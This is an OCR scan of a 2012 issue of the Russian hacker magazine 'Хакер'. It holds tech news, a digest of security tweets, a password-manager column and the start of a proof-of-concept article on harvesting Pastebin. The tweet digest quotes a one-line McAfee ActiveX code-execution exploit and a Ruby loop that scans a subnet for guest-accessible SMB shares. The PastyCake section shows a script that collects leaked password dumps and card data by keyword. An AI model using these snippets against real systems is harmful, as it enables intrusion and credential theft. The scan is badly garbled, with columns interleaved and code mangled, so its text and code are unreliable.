должен особенно обра д о в атыех, чьи глаза чувствитель­

она также и в России!. Ориентировочная цена 527В970

ны к так н аз ы ваемому <<к ри ста л ли ч ескому эффекту>> !он

состави т $1199.

ЭТА МУЗЫКА БУДЕТ ВЕЧНОЙ. ПАТЕНТНЫЕ ВОЙНЫ ПРОДОЛЖАЮТСЯ

APPLEOБBИHЯETSAMSUNG ELECTRONICS В ТОМ, ЧТО ЧЕХЛЫ ДЛЯ ПЛАНШЕТАGАLАХУТАВ 10.1

И СМАРТФОНОВ (!) НАРУШАЮТ ЕЕ ПАТЕНТЫ

010

ХАКЕР

03/158/ 2012


PhoneAndroid: Почти закончил с

linux.js. Да,

это

моя JаvаSсгiрt-реализация ядра

Linux.

[]

Почему вы на меня так

Яндекс, сnециалист по безопас­

Chгoot-ing в

ности веб-приложений: спе­

легко, как и А : , Б:, В : ...

циалист по безопасности веб­

http://Ьit . lv/yQQq_ml:J .

Windows- так

же

приложений в компанию Яндекс ...

Ь.it.lvд'ol.,m_!?.<J .

Комментарий:

Да, в винде тоже можно <<чрутить>> ...

lilcBekrar: Взлом Chгome с

ASLR + О ЕР­

обходом + ядреный сnлойт для

Комментарий: Конкурс Яндекса

El

по взлому сервисов прошел удачно;] . lil_sinnЗr:

обхода nесочницы за сов? Мы живем в разных мирах .

El

1О к бак­ #pwn2own

А вот и РоС для

lilcBekrar:

Комментарий: Фронтмен компании

Vupen

Большой #fаil-приз отправляется

возму­

к

щается призовым фондом предстоящего

конкурса

PWN20WN.

McAfee SaaS 0-day IZDI-12-012]: obj.ShowRepoгt "calc.exe" .

Защитные механи1мы

становятся все сложнее, и для их обхода требуется больше сил и вложений ...

McAfee

Secuгity-as-a-Service,

который устанавливает позор­

ный

ActiveX,

I:Jjt.jyд_bj..t_gf

Комментарий:

Вот и весь эксплойт- obj.ShowRepoгt

позволяющий выполнять код

"calc.exe".

via rathezdi.

пания устанавливает «бэкдорь~» клиентам.

Да ... вот так антивирусная ком­

А еще забавно, что эа такую

тила в районе

lilmartincronje:

lilmeder: Написал в блог о моем послед­

Один раз и для всех :

нем баге:

CSS

или JаvаSсгiрt-библиотек

типа

jQuery.

CVE-2011-3923.

Еще

одно удаленное исполнение

кода в Stгuts2: Ьlt.R:fiЬ.i.!JYLY.E.iЬ.ы.

El

0-day ZDI запла­ 1-2 к баксов . :] Вот так ...

El

Комментарий:

HTML5 !=

Комментарий:

Исходникам не доверяй никогда, Люк! Дебаггером воспользуйся вначале и убедись в потоке

Кэп ...

Сегодня у нас будет много ссылок­

общеобразовательный выпуск т витов, так сказать. Те, кто думает, что на

Java

lilmikesica:

можно

Любой хороший инженер лени­

кадить, не оnасаясь RСЕ-багов !ну как же,

вый, тем не менее, не каждый

Java- это ж секурно], подумайте еще раэ! Ведь накадить можно всякое ...

ленивый инженер хороший.

Если бы РНР был британским:

peгchance ifcondition] { // Code hеге}

otherwise { // Code hеге }.

liljcran: Написал новый блог-пост: поиск

багов в виртуальной машине с помощью «Докаэателя тео­

рем» - bl.lgД.pjt . [y/~J.gZ~К.

El

Комментарий:

Не фаззингам единым ... те, кто инте­

ресуется методами поиска уяэвимостей,

Ручной-- iгЬ> l1 .. 254].each {lxl puts "host- 10.0 . 0 . #{х}"; 'smbclient -L 10.0.0.#{х} -Uguest -N' }.

El

Комментарий:

RuЬу-скрипт для скана «шар» с учет­

кой гостя ...

обратите внимание на это.

lilstephenfewer: Открыл порцию исходников моей системы фаззинга для браузеров

Не знал о BinScope: hllQJLI:Ij_tJYLyzcQYR . Полезна

для

обнаружения бинарников без

NX, SafeSEH, /dynamicbase, и т . д.

'Fгindeг'- http:UЬit.lyLx.rUJJiW.

ХАКЕР

03/158/2012

.,,


В СЕТИ В ВИДЕ ТЕКСТОВОГО ФАЙЛА оказалисьданные о шести миллионах nоль з ователей крупнейшей в КНР комnании­ разработчика сетевого ПО (CSDNI.

MEGANEWS

МИНИСТР СВЯЗИ ПОСЕТИЛ

СОБРАНИЕ ПИРАТСКОЙ ПАРТ ИИ ПАРАДОКСАЛЬНО, НО ЭТО СОБЫТИЕ ИМЕЛО МЕСТО В РОССИИ

В хо д е бесе д ы с о Щ е ­

BSOD

В

WINDOWS 7

ЛЕГКИМ ДВИЖЕНИЕМ РУКИ НАЙДЕНА КРИТИЧЕСКАЯ ДЫРКА В ссСЕМЕРКЕн

голевым выясни­ л ось, ч то в це ло м о н

п о ддержи в аети д е ю о ткрыты х д анн ы х , н о д ек лар ац ию о т­ к рытого госуд а рства как-т о « не о цени л •>.

Кстати, официал ь ­

и

нф о р ма ция о н о вой н е за к рытой к ритиче с к о й у я з вим ос т и в Wind ow s 7 х6 4 вп е рвы е появила с ь в Т витт е р е изв ес тн о г о ха кера

w3bd3vi l. Б а г был wi n32k.sys [ н ео д но кр а т н ы й вин о вни к кри т ич ес ки х ошиб о к в Win XPI.

о бнар у ж е н в ф а йле операционной систем ы

ных коммента р ие в

ко т о ры й с о д е р жи т за в ис ящ у ю о т ядра ча с ть п о льз о ва­

п о поводупри­

т е л ьско г о ин т е р ф е йс а и о тн ос ящ уюс я к нем у инфрастр у к­

сутствия главы Ми н­ комсвязи на встреч е

ту р у. Зам е тим, чт о 32 - би тн а я в е р с ия ОС не во с nриимчива

членов Пиратск о й

к ош ибке, в то вр е мя к ак 6 4- б итная << Семерка » может

партиитак и не по­

н е толь ко у й т и и з-з а не е в

следова л о .

BSOD,

но и nозволяе т внедрить

в ма ш и н у вр е д о н ос ный к о д на у р ов не ядра. Однако самый ин т е р ес ны й нюан с з а к лючается в др у гом: пр о тотип кода , демонс т риру ющ е го , как вы з ы ва т ь данный с бо й, уже у тек в С е ть . О к а з а лос ь , ч то это пр ос т ой НТМ L- скрипт. Е г о з а­ п уск в б ра узе р е

Sa fari б ы с тр о пр иведет к ошиб ке с тра н и­

ц ы на н е спр е д е л е н на м у ча с т к е nамяти, и машина n о кажет

•с и н ий э кран с м е рти ». Этотскриn т представля е тсоб о й все г о лишь т е г

iframe с чр ез выч ай н о б о льшим атриб у том

высо т ы. Уя зви м ос т и т о чн о п о дв е р же на 64-битная версия

к

а к известно , в России П ира т екая партия даж е не зарегистрирована [нет,

Windows 7, о дн ако,

ребята пытались , но ничего не вы ш ло) . Тем не м е нее, пар т ия регулярно

ском п р о ме тир о в ан ы и др у г ие с и с темы. Патчана данный

nроводитсобрания,одноизкоторыхсостоялосьв с ерединея н варя

момен т н е су щ е ств уе т .

как от м е ч аю т э к с перты , м о г у т быть

в книж н ом магазине << Ц иолко в скиЙ>>, к~то ры й наход ится в зда н ии П олитехниче ­ ского музея . Д ля всех пришедших на совмест н ый сбор П иратской n артии, Ф он д а развития электронной демократии и рабочей группы << ИГ протест н ых действий>> стало полной неожиданностью появление в магазине Игоря Щ еголе в а , ми н и ­

стра связи и массовых коммуникаций РФ. П редсе д атель партии П а в ел Р ассуд о в nишет в своем ЖЖ : << М инистр сделал вид. как будт о зашел в в ы хо дн ой купит ь п ару к ниг и ничего не знал о н амечен н о м собрании. П рисутст в ую щи е н а в стре ч е п ро г раммеры с р азу нак ин ул ись на Щ е г оле в а. Ещ е быl Н е каж д ый д е н ь ес т ь возможность высказать в се что думаешь в лицо министру связи. Ау n р о гр ам ми­

стов было что ему сказать.

:1 Н о министрдержался молодцом, говорил ск л а дн о,

однако не сказал ничего конкретного. Сразу видно - большой опы т работ ы в аппарате >> . Щеголев ответил на ряд вопросов, за д анных учас т никами собра ­ ния. В частности, рассказа л , что за го д -по л тора в Р оссии може т б ыть вв е д е н а

система электронного голосова н ия, однако общество, по мне н и ю минис т ра, пока не испытывает nотребнос т и в такой системе. П одробности в ЖЖ П авла

Рассудова:

webpo lit.livejournal.com/72397.htm l.

NGIИX сс ВИНЧЕСТЕРНЫЙ» ГИГАНТ

NGINX ВЫШЕЛ НА ВТОРОЕ

ТН Е Pl RATE ВАУ &ОЛЬ-

-компания

МЕСТО по числу обслужи-

ШЕ НЕ &УДЕТ ХРАНИТЬ

TORRENTFREAKCOO&ЩАЕТ, чт о Cr ysis 2 стала

приобрелаподразделение

ваемых активных сайтов,

ТОRRЕNТ-ФАЙЛЫ и nолно-

с амо й скач и ваемойчерез

nомощью тут же обвинил

комnании

обогнав

стью п е р е й де т на magnet-

BitТo r rent игрой для РС

ссы л ки. Теn ерь magnet-U RL

в 20 11 г оду. С л едо м и дутСаll of Du ty: Modern Warfa r e 3 и Battlefield 3.

Google в nоддержке nиратства . В Google сnоко й но на-

Seagate-

Samsung по про-

изводству жестких дисков.

Суммасделкисоставила

$1,375 млрд.

012

Microsoft 115. По данным комnании NetCraft, на первом месте nока Apache (57,93 %).

предлаг аю т с я дл я загруз ки по умолчани ю .

МЕДИАМАГНАТРУПЕРТ

МЕРДОК завел Twitter и с его

звалиобвинение чушью .

ХАКЕР

03 /158/ 2012


GOOGLE НА ТРИ ГОДА ПРОДЛИЛАСОГЛАШЕНИЕ С MOZILLA об исnольз овании своего nоисковика в качестве основногодля Fiгefox .

БОЛЬШЕ КОЛОНОК, ХОРОШИХ

MICROSOFT, КОНКУРЕНТЫ

И РАЗНЫХ

ИАRМ-СИСТЕМЫ

СРЕДНИЙ ЦЕНОВОЙ СЕГМЕНТ И НЕИЗМЕННО ВЫСОКОЕ КАЧЕСТВО.

О НЕ ВСЕГДА ЧЕСТНОЙ БОРЬБЕ ЗА МЕСТО ПОД

КОНЕЧНО, ЭТО

СОЛНЦЕМ

EDIFIER

Е

ще в конце прошлого года компания

Microsoft

сделала заявление, которое породило у многих

нехорошие подозрения . Напомним, о чем идет речь .

В конце 2011-го компания

Microsoft впервые озвучила , что Windows8 будеттребовать Secuгe Ьооtдля загрузки [то есть обязательной активации режима безопасной загрузки

UEFII. Эта функция работа е ттак : UEFI сохраняет«секретные ключи >> в ОС. Все, что хочетзагрузиться на компьютер, к при­ меру операционная система, и с польз уе тэти ключи для до­

с туп а к

UEFI. Е сли в ОС не прописан соответствующий ключ ,

она не получит разрешение на загрузку. Liпu х-сооб ще с тво уже тогда попыталосьдонести до пр оиз водителей , что

реализовать передач у ключей в из-за чего установить

Linu x будет очень сложно, Linu x на заточенные под Windows8

устройствастанетпрактически невозможно.

Однако

Microsoft корректно пояснила , что не имеет Linu x и дру ги х о ткрыты х ОС , и сражается

ничего против

отнюдь не с ко нк у р е нтами , а с вредоносными кодами. Мол , безопасная загрузка тем и х ороша для работы

к

итайская компания Edi fieг представила в э том месяце сразу две новых модели. Об е новинки по­

полнили топовую линей ку систем

2.0. П ервое ауд ио-ре ш е ние- колонки R1500TM

с пр о­

фессиональным микрофонным входом, который имеет независимый регулятор громкости . Новинка может похва­

статься тради ц ионным для

Edifier деревянным

кор пусом

[что гарантирует о т сутствие резонансов!, НЧ-дина миками

napa

интересных

фактов : на заводах

компании Edifier производится более 12 млн комплектов мультимедийных к о лонок в год . За­ воды расположены на трех континен­

тах. Научно­ исследовательским

с магнитным экра н иро в а нием и 18-мм шел ковыми ку­

центром компании

полообразными твитерами . Стереосигнал, подаваемый

руководит всемирно

на входные разъемы

RCA,

обраба тывает ся схемой дина­

мическо г о повышения высоких частот, которая спе циаль­

известный инженер

вредоно сных программ. Надо признать, выглядит все это действительно логично. Но теперь

Microsoft подготовила док уме нте требова­

ниями, которые необходимо выполнитьдля сертификации компьютеров на со вместимо ст ь с Windows 8. Бумага , увы,

подтвержд ает худшие опасения. Здесьлучше всего про­ цитировать.

Официальн ое руко водстводляпроизводителей,желаю­ щи х пол учить сер тификацию Windows 8для своих ус тро йств,

и дизайнер Фил

с траница

Джонс .

мо реализовать возможность отключения

но разработана для мультиме диа.

Windows, что

такойпроцессперекрываетещеодинканалпроникновения

116: « В системах, не относящихся кАRМ, необходи­ Secure Boot через

интерфейсустановки прошивки . Физически присутствую­

Вторая новика-двухполосные колонки R900Т. Эта акустическая 2 . 0-система, оснащенная 4-дюймовыми НЧ-динамиками и 13-мм шелковыми куполообразными

щий пользовательд о лж е н иметь возможность отключить

Secure Boot через интерфейс установки, не владея Pkpri v. Программное отключение Secure Boot средствами UEFI

т ви терами, хорошо воспроизводитгл убок ий, богатый

не должно быть возможно ни во время за грузки , ни по ее

бас и зво нки е высокие частоты. Габариты

о кончании>>.

скромны:

140 х 226 х 197 мм.

R900T весьма

Колонки легко подключить

П олучается, заявление

Microsoft ото м, что она небу­

к выбранн ым источникам сигнала через 3,5-мм с тер еовхо д

деттребоватьотnроизводителей «ж елеза•запретить

RCA или RCA на RCA,

отключение

ко торые с п особ ны принять и уси лить

Secure Boot, на деле распространялось только

сигнал, поступающий с любого источника звука, и обес пе­

на традиционные ПК , н о не на АRМ-устройства. Пр оизво­

читьвысокоекачество звучания.

дит е ли систем, базирующихся на ар х итектуре ARM , теперь не до лжны предоставлять никаких способов отключения безопасной загрузки. Именно этот момент - обязательная

ПОВСЕМЕСТНАЯАВТОМАТИЗАЦИЯ

безопасная загрузка -ставит Linu x [и не только! в затруд­ нительное положение. Фактически это озна чает, чтотеперь для «за гружаемости >> на одной из таких машин , сертифици­ рованных на совместимость с Windows

ПО АДРЕСУ MEGASEARCH.CC ЗАРАБОТАЛ АГРЕ ГАТОР КАРДЕРСКИХ МАГАЗИНОВ, ТО ЕСТЬ РЕСУРС ДЛЯ ПОИСКА ВОРОВАННЬIХ БАНКОВСКИХ КАРТ ХАКЕР

03/158/ 20 12

8, соответствующий

ди с трибутив Linuхдолжен иметь се ртифицированные крип­ таключи от конкретного и з г отови т ел я компьютера. Вста е т ре з онный вопрос: где их взять? Е сли выдачей ключей будут за ниматься производители , то разработчикам ди стрибу ­ тивов придется отдельно контактировать с каждым из ни х.

Иеслиогромная ко рпорацияможет се бетакоепозволит~ толин укс оидам это врядли окажется под силу. Централи­ зова нного о ргана сер тификации , который бы формировал к лючи для режима безопасной загрузки

UEFI, не существует. Microsoft пытается бороться далеко н е только с малварью, но и с устано в к ой Linu x, Android и др у­ Словом, по хоже,

ги х открытых ОС на АRМ-системы.

013


MEGANEWS

КАРСТЕН НОЛ ИЭSECURIТY RESEARCH LАВS нашел очереднуюуязвимость в GSM . Подробности он пока не разглашает. ·

СКАЧАЙ И РАСПЕЧАТАЙ!

PWN20WN

ПИРАТИТЬ ЧЕРЕЗ СЕТЬ МОЖНО НЕ ТОЛЬКО ИНФОРМАЦИЮ,

ПРАВИЛА

МЕНЯЕТ

НО И ВПОЛНЕ РЕАЛЬНЫЕ ОБЪЕКТЫ

ПОПУЛЯРНЫЙ КОНКУРС В ЭТОМ ГОДУПРОЙДЕТ В НОВОМ ФОРМАТЕ

м

ы уже не ра з рас­

сказывали тебе о замечательномха­

кереком конкурсе

Pwn20wn,

учас тни кико т ороголомают

самый разный софт и желе­ зо, а nотом уносят с собой

хакнутыетрофеи [железные, конечно же) в качестве при ­ зов. Сообщаем, что в этом году правила соревнования

изменились. Теперь в конкур­ се участвуюттолько

з

Microsoft Apple Safaгi, Google Chrome и Mozilla lnteгnet Exploгer,

0-принтеры медленно , но верно про­ бираются на потребительский рынок .

Уже сейчас такой девайс [к примеру,

японскую

Firef oxдля операционных си­

iModela) мож но при обрести за пару

стем

вариант, а не жуткий промышленный станок не­

вообразимых размеров. С каждым днем об этих трехмерных чудесах прогресса появляется все

больше статей, постов, дискуссий. А раз интерес и спрос растут, появляется и предложение .

Ещ е пр о шлой осенью на т орре нт-тр екере

The Pirate Ва уоткр ыл ся

раздел с пр ограммами

для 30-принтеров, но какая-то активность наметиласьтамтолькосейчас.Д об рыелюди

Windows 7 и

Мае

05 Lion

[последние версии со все-

тысяч долларов, и э т о будет именно «домашний»

ми патчами). Мобильные

Одним из наиболее

девайсына конкурсе больше

известны х про·

взламывать не будут.

ектов по ЗD·печати является

RepRap

Главным сnонсором объявле-

-открытый прое к т

на компания

по созданию принте­

Hewlett- Packard. 30

р о в , способных

Три по бедителя получат денежныепризыв размере 60тысяч,

воспроизводить

тысяч и 15тысяч долларов плюстрофеи в виде н аутбуков с той самой

себя. Новейшая

системой , которую им удастся взломать.

модель называется

Mendel, и собрать

Компания

Google также учреди ла дополнительные призы 20 тысяч долла­

наконец-то начали делиться как программа ми,

ее способен любой желающий (это

так и реальными объектами. Уже сейчас в этом

действительно не·

ров за исnолнение sandbox-кoдa с исnользованием одной только

разделе можно с кача ть пластма ссово го робота

сложно!. Стоимость

уязвимости в

за взлом браузера Chгome. Она обе щает заплатить

всех компонентов

Chrome.

В

1О тысяч долларов оценивается

ис п олне н ие

из вселенной Warhammeг 40К или хот-род­

составляет всего

sandbox-кoдa с исnользованием уязвимастей как в Chгome, так и в

мо д е ль ш евроле

$520.

операционной системе.

1970 года .

Н о это безобидные

игру ш ки, а ведь в Сети уже некоторое время цир­

Но самое главное, что в этом году изменятся сами правила

кулируютслухи ото м, что на черном рынкетор­

Pwn20wn . Взломанная система теnерь не исключается

гуюти30-моделямискиммеровдлябанкоматов.

зания, как раньше . Все остальные участники имеют возможность

из состя­

Есть даж е n одтверж д е ния тому, что моше нни ки

в течение трех конкурсных дней взламывать ее своими методами.

действительнопольэуютсятакимимоделями!

Соответственно, результат соревнования теперь подсчитывается

Н е т, в « Б ухте» они пока не в сплывали, но это

no очкам.

явно воnрос времени . По хоже, у правоохрани­

В этом году

тельных органов по всему миру скоро появится

курсе можно участвовать и в удаленном режиме!

Pwn20wn

nройдете

7 по 9 марта.

Не забывай, что в кон ­

еще о дна головная боль .

КОМПАНИЯSОNУПРЕД­

СТАВИЛА КАРТЬI ПАМЯТИ

SONY

собственного формата

XQD.

Ориентированы они как на профессиональных фото­ графов, так и на энтузиастов.

В режимах чтения\эаписи

H

Seri senees

32 GB

пропускная способность

достигает

1 Гбит/с (125

XQD

Мб/с) .

ДВАДЦАТЬВОСЬМОГО

КОМПАНИЯ TIOBE SOFTWARE

Продажи уже начались. Карта

ЯНВАРЯ СТАРТОВАЛ ВТОРОЙ

УДОСТОИЛАОВJЕСТIVЕ-С

QD-H16 объемом 16 Г б стоит $130, QD-H32 на 32 Г б- $230,

FACEBOOK HACKERCUP,

ЗВАНИЯ «ЯЭЬIК ГОДА».

который проводится еже­

Однако на первом месте

Также представлены и устрой­

годно . Лучших ждет поездка

по популярнотипо-прежнему

ства для работы с новым

в штаб-квартиру Facebook,

стоит Java, а за ней идут С,

а победительполучитпять

С# и С++.

форматом.

тысяч долларов.

ХАКЕР

03/158/2012


• •

~ WI!XLI!Г.

www.wexler.ru

Электронная книга с доступом в Интернет

У SYMANTEC УКРАЛ И ИСХОДНЫЕ КОДЫ АНТИВИРУСА

Читай. Смотри. Слушай.

ХАКЕРЫДИСКРЕДИТИРОВАЛИПОПУЛЯРНОГО ВЕНДОРА

оддавлением хакеров компания Symaпtec, являющаяся одним из самых известных в мире поставщиков решений

в сфере информационной безопасности, была вынуждена признать, что хаке рам удалось получитьдоступ к исходному коду це ­

лого ряда ее прод уктов. По словам представителей Symaпtec, в ходе расследования было установлено, что кража исходного кода анти­

вирусов произошла еще в

2006 году.

После этого компания ввела ряд

мер для усиления безопасности, чтобы не допустить повторения по­ добных инцидентов в будущем. Хакерам удалось похитить исходные коды таких продуктов, как Nогtоп Aпtiviгus Согрогаtе Editi oп, Nогtоп l nteгпet Secuгity, Nогtоп SystemWoгks и pcAnywheгe версий

12.0, 12.5. Об утечке стало известно в середине прошлого месяца, когда некий хакер Yama Tough, причисляющий себя и к «Ано нимам», и к хакерекой группировке Lo гd of Dhaгmaгaja, написал в Твиттере, что располагает исходниками Noгton Utilities. В доказательство он 12.1

и

выложил ссылки на небольшой документ с описанием программно­ го интерфейса сервиса для создания о писаний образцов вирусов,

а затем и с писок файлов, содержащихся в архиве с исходным кодом Nогtоп Antiviгus. Опубликованный док у мент, кстати, датируется апрелем

1999 года.

Конечно же,

Symantec сразу сообщила,

что

информация из этого документа не может навредить нынешним продуктам компании. Зато архив с исход ным кодом компания не про­ комментировала.

П о заявлениям самих хакеров, информа цию им удалось выудить

с серверов ведомства военной разведки Индии. Иными словами,

у течка произошла не из сетей самой Symaпtec [хоть это радует). По некоторым данным, хактивисты опубликовали имеющуюся у них информацию, чтобы помочь судебному разбирательству, которое

недавно началось в США. Д есятого января против Symaпtec было выдвинуто обвинение в том, что она продвигаетсвою продукцию с помощью так называемых sсагеwаге-программ, которые запугива­

ют пользователей, извещая их о возможных проблемах с безопасно­ ст ью в особенно назойливой форме. Несмотря на все заявления Symaпtec, что у хакеро�� оказались старые данные, которые не могут нанести никакого вреда, раз­

работчики уже начали выпускать патчи. Компания предп очитает перестраховаться , вне зависимости оттого, откуда именно «утекла»

информация и насколько она актуальна на данный момент.

WEXLER.BOOK

МЫ ЛЕГИОН: ИСТОРИЯХАКТИВИСТОВ

ПРОФЕССИОНАЛЬНЫЕ ДОКУМЕНТАЛИСТЫ ИЗ КИНОКОМПАНИИ LUMINANT MEDIA СНЯЛИ

93-МИНУТНЫЙ ФИЛЬМ

О ВЕЛИКИХ И УЖАСНЫХ

ANONYMOUS ХАКЕР

Т7006

WI!XLI!Г. STORE

Удобный достуn к бесnлатным книгам и nоnулярные новинки.

Скачивайте и читайте на

www.wexler.ru!

:х:

о

«МЕТРО 2033» ДМИТРИЯ ГЛУХОВСКОГО И ЕЩ~

<t

ДВА РОМАНА КУЛЬТОВОЙ СЕРИИ БЕСПЛАТНО

Cl.. с:[

о

В ЭТОЙ ЭЛЕКТРОННОЙ КНИГЕ WEXLER

r::

03/158/2012 ТЕЛЕФОН ГОРЯЧЕЙ ЛИНИИ : 8 (800) 200 96 60


IEADER

КОЛОНКАСТЁПЫИЛЬИНА

ОХРАНЕНИИ ПАРОЛЕЙ ВЫБОР РЕШЕНИЯ

или извращаться с его синхронизацией через

активировать в аккаунте

Использовать один и тот же па роль для всех

тот же самый Dг орЬох . Дост уп к хранилищу

вые па роли, то войти без такого токе на будет

сервисов сразу- одна из самых серьезных

защищен мастер-ключом [сложным паролем),

уже невозможно. Каждый раз будет необхо­

ошибок пользователей. Но и удержать в голове

который в целях безопасности невозможно

дим о вставить флешку, запустить

огромное количество уникальных пассов­

восстановить. Будь осторожен!:)

использовать сгенерированный программой

НЕКОТОРЫЕ ФИШКИ LASTPASS Я не буду рассказывать о том, как использо­

Только в этом случае можно будет добраться до

задача явно непосильная. Я долго пытался

одноразо­

Sesame

и

параль вместе со своим мастер-ключом.

приучить себя к использованию менеджеров

па ролей вроде

LastPass

KeyPass [keepass.info), но

из этого так ничего и не вышло. Открывать

вать

программу, чтобы искать там нужный параль

могу не поделиться с тобой несколькими по­

-явно не самое удобное, что можно приду­

лезными фишками, которые меня порадовали .

LastPass,- там

все элементарно. Но не

мать. Да и локальное хранилище, в котором

хранилища. По отдельности что мастер-ключ, что флешка с

Sesame

ценности для злоумыш­

ленника уже не представляют.

Двухфакторнан авторизация через

Google

находятся зашифрованные па роли, попахивает

Проверка надежности па ролей

Для авторизации ты также можешь купить

архаизмом- не таскать же его на флешке?

Один только факт того , что па роли хранятся

настоящий токен-например YuЬikey за

Короче говоря, я решил попробовать решения,

в надежном хранилище, не делает их по­

[ stoгe.yuЬico.com ),- а можешь воспользовать­

которые так же, как и

настоящему безопасными.

ся уже готовым решением от

KeyPass,

:)

помогали бы

LastPass

с твоего

Google.

$25

Напомню ,

генерировать уникальные па роли и сохранять

разрешения может сделать быстрый анализ

что система от поискового гиганта предлагает

их, но вдобавок автоматически использо-

пассов, легко отыскав среди них простые и от­

установку насмартфон специального прило­

вали бы их в браузере! Вариантов тут не так

кровенно слабые [вроде

жения

много. Среди специализированных решений

му встроен бенчмарк, который высчитывает

«123456») . В програм­

[Google Authenticatoг), которая в каждый

момент времени генерирует уникальный одно­

наиболее раскрученной оказалась программа

показатель надежности всех паролей,- ре­

разовый ключ. Так как я постоянно пользуюсь

1Passwoгd [ agileЬits.com/onepasswoгd ), кото­

зультат можно сравнить с показателями других

этой системой для входа в

рая изначально появилась для Мае, но позже

пользователей в специальном рейтинге.

настроил ее и для защиты

Одноразовые парали

са йте 1helpdesk.lastpass . com/secuгity-options/

goog 1е -а ut hе nti саtог).

была портирована и для

Windows.

Продукт

очень качественный, но отдавать $69.99 за

Gmail, то я тут же LastPass . Подроб­

ную инструкцию можно найти на официальном

кроссплатформенную версию мне показалось

Многих, вероятно , смутит возможность до­

слишком. Тем более сегодня, когда практиче­

ступа к па ролям с помощью одного только

ски для всего можно найти бесплатную альтер­

мастер-ключа . Нет проблем! На флешку можно

одноразовые парали и двухфакторная автори­

нативу. Та ко вая, в общем-то, действительно

записать специальную утилиту LastPass Sesame [есть версии под любые ОС), которая,

зация доступны только платным подписчикам .

быстро нашлась-ейстал замечательный

сервис

по сути, превращает накопитель в токе н. Если

надежное хранение па ролей.

LastPass [lastpass.com), на котором я и

Справедливости ради стоит отметить, что

Но $12 в год- не такая уж большая плата за

остановился. Очень кратко опричинах, почем у

я выбрал его. Во-первых, сервис универсален

и работает под любой ОС

[Windows, Linu x, Мае),

Sign in to Gmaillj\Jith your

что было для меня важным критерием. Он имеет плагины для всех поп улярны х браузе­

Goug[e Account

ров [Fiгefox, lnteгne t Ехрlогег, Chгome, Safaгi, Орега). А платным подписчикам [$1 в месяц)

Dl Dl

доступны также версии для поп улярных

мобильных ОС . Во-вторых,

LastPass

Username: llpuser ::::==========~ ! Password:l••••••••

делает

ровно то, что от него требуется- автомати­ чески предлагает сохранить па роли и данные

форм, а затем подставляет их при следующем

D

посещении страницы. Е сли аккаунтов для какого-то сайта несколько, то можно быстро

Stay signed in 1 Sign in

переключиться с одного на другой. А если

J

для какого-то кривого сайта данные автома­ тически не парсятся, то это легко исправить

вручную. В-третьих,

LastPass

Can't access \'СUГ acccunt?

храни т зашифро­

ванные па роли в облаке, поэт ому хранилище с па ролями не надо носить с собой на флешке

016

LastPass

работает на любых устройствах и ОС

Автоматический вводлаги на и пара ля из базы

ХАКЕР

LastPass

03/158/ 201 2


Proof-of-Concept СОБРАТЬ ИНТЕРЕСНЫЕ ДАННЫЕ С PASTEBIN.COM И ПОДОБНЫХ СЕРВИСОВ

ХОСТИНГ ТЕКСТА

Такая популярность ресурса легко объ­

Максимально быстро и удобно расшарить лю­

яснима: каждый может опубликовать на нем

бой текстовый файл - такова миссия извест­

любые данные вообще без регистрации. При

ного онлайн-сервиса PasteЬin . com. Создатели

этом записи не пр оходят никакой премодера­

изначально рассчитывали, ч то их проектом

ции и тут же оказываются в Сети. Моментально.

будут активно пользоваться nрограммисты,

Руководство, конечно, удаляет прот ивозакон ­

которые легко смогут выкладывать на этом

ный контент по первом у запросу правообла­

ресурсе любые исходники с подеветкой синтак­

дателя или пострадавшей стороны, но к этому

писан на

Python,

то запускается всё из команд­

ной строки:

python gather.py -k kwords -о urls.db \ -а -"pastycake@gmail.com-" harvest Ключ 'haгvest' включает режим сбора

данных. Отчеты о найденных данных будут

сиса. И так вначале и было. Н о чего они точно

времени он уже успевает расползтись по Сети.

отправляться на указанный

не могли ожидать, так это бешеной популярно­

Это , в общем, история не только про PasteЬiп .

<< -О >>ис пользуется для выбора файла для

сти сервиса у хакеров . Вспомни все последние

сот, но и про др угие похожие сервисы:

вывода . А ключ

истории с взломами от Анонимов и

ключевых слов, на которые будет реагировать

-почти всегда для публикации конфиденци­

Pastie, FгubaгPaste, YouгPaste, Codepad, Slexy и Lodge lt. Идея сегодняшнего РоС- автомати­

альных данных [к примеру, дампов паролейl ис­

ческий сбор «интересных» данных с подобных

пожалуй, самое главн ое . Например, упо­

пользовался именно PasteЬiп.c om . За примерам

ресурсов. Иными словами, надо реализовать

мянутые выше сценарии были максимально

далеко ходить не нужно. Среди наиболее по­

инструмент, обходящий записи и по некоторым

адаптированы для поиска дампов с учеткам

Lulzsec

<<-k>>

e-mail.

Опция

позволяет задать базу

граббер . Вообще, настроить кейворды- это,

пулярных на текущий момен т записей [ pasteЬin .

ключевым словам собирающий большую базу

пользователей, логов чата, информации о кре­

com/tгends l несложно заметить, к примеру:

данных «интересного>> контента.

дитных картах и банковских аккаунтов. Список

• дамп каких-то учета к с Fa cebook; • внутреннюю базу данных какого-то

ключевых слов, используемых по умолчанию

взломан­

ного сайта, включая e-mail'ы пользователей

в

PastyCake, прямо

скажем, невелик:

Идея, на самом деле , не новая. В Сети можно найти немало написанных на коленке сценари­

и хеш и их па ролей;

СБОР ДАННЫХ

листинг IР-адр есов с привязкой к конкретным

организациям и компаниям.

ев: например , от malcOde [ Ьit . ly/Aп58Yd l или NeonTempest [ Ьit.ly/zRuК7o l. Но лучшей реа­

DEFAULT_KEYWORDS = [ 'password' , 'hack' ,

лизацией затеи, пожалуй, является сценарий

PastyCake от исследователя 9Ь+ [ Ьit. l y/xHXd f H I, de f

readke-fWOrd8 {fЬ&n.:llet:

который он опубликовал совсем недавно.

"'f7. tu~ [_.r s ;r1p(l for _ l n t hendl e ]

dtiГ

fltch (ltOIIif!, 10\lrCf!l, lritY"//rdl,

se trch_rc"'

l~t'e-UtCh):

N.c:~~~;~ilc( 'I' .]Oln(Ryvo:dsl)

for QC:Iera:.cr,

pt t.Ь

':ittt

s :&tus ,

in

про верить, как идея реализована на практике.

на хостингах PasteЬiп .com и Pastie.oгg и логи­

Дальше всё зависит от твоей фантазии.

ровать все записи, используя базу ключевых

s rc:.new_urls{ s to r a~11:):

• ;t ntrttor.~t..,;tttt(path)

слов. Результаты сохраняются в текстовом

! ull_url •IJ1!:!1eracor.!ull ..u:l{Jiath)

файле или базе данных

print •ts

NtC.Ьtd

SQLite.

В ближайшем

времени дополнительно появится поддержка

s coraoc . s avc_url(!ull_url, :uec:h.Qroup(l

Н

utch and stoa ..IOoltC:h a l sa

' ' ' t (!ll.ll_u:l,

"'~ 1

MongoDB

и

MySQL.

П оскольку сценарий на-

